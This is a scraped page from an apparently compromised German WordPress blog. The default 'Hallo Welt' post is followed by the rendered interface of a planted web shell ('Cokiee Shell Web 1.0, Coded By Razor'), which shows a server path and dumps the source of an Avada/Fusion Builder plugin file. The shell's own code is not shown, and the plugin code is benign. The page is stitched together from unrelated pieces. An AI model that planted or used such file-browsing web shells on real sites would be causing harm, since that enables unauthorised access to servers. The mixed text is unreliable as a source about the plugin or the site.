Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web28/html/wp-content/plugins/fusion-builder/shortcodes/ |
Current File : //var/www/web28/html/wp-content/plugins/fusion-builder/shortcodes/fusion-woo-checkout-form.php |
<?php /** * Add an element to fusion-builder. * * @package fusion-builder * @since 3.3 */ /** * Map shortcode to Avada Builder * * @since 3.3 */ function fusion_builder_element_checkout_form() { fusion_builder_map( [ 'name' => esc_attr__( 'Checkout Form', 'fusion-builder' ), 'shortcode' => 'fusion_woo_checkout_form', 'hide_from_builder' => true, 'help_url' => '', 'params' => [ [ 'type' => 'textfield', 'heading' => '', 'description' => '', 'param_name' => 'checkout_form_content', 'value' => '', ], ], ] ); } add_action( 'fusion_builder_before_init', 'fusion_builder_element_checkout_form' );
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare